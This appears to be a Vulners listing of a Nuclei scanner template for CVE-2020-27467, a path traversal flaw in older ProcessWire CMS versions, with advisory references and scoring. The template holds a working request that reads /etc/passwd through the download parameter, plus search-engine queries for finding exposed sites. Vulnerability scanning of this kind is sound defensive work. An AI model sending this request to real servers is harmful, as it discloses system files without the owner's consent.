Lucene search
K

Processwire CMS <2.7.1 - Local File Inclusion

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Processwire CMS <2.7.1 - Local File Inclusion vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-27467
15 Jan 202414:41
circl
CNNVD
Lfi-ProcessWire Cms 路径遍历漏洞
24 Feb 202200:00
cnnvd
CVE
CVE-2020-27467
22 Feb 202220:59
cve
Cvelist
CVE-2020-27467
22 Feb 202220:59
cvelist
NVD
CVE-2020-27467
24 Feb 202215:15
nvd
OSV
CVE-2020-27467
24 Feb 202215:15
osv
Prion
Directory traversal
24 Feb 202215:15
prion
RedhatCVE
CVE-2020-27467
22 May 202515:48
redhatcve
id: CVE-2020-27467

info:
  name: Processwire CMS <2.7.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
  remediation: |
    Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability.
  reference:
    - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire
    - https://processwire.com/
    - https://github.com/ceng-yildirim/LFI-processwire
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27467
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27467
    cwe-id: CWE-22
    epss-score: 0.15737
    epss-percentile: 0.96465
    cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: processwire
    product: processwire
    shodan-query: http.html:"processwire"
    fofa-query: body="processwire"
  tags: cve,cve2020,processwire,lfi,cms,oss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?download=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f9cfbb710174c132f2a5c6107b8b3e235781f8837bc8fb14983c0d9e62d404d1022100a69bfe904f0c0b93ab13f888318a749bf51e26806aa9c32a84d3a3926b2fcafd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
CVSS 27.8
EPSS0.15737
25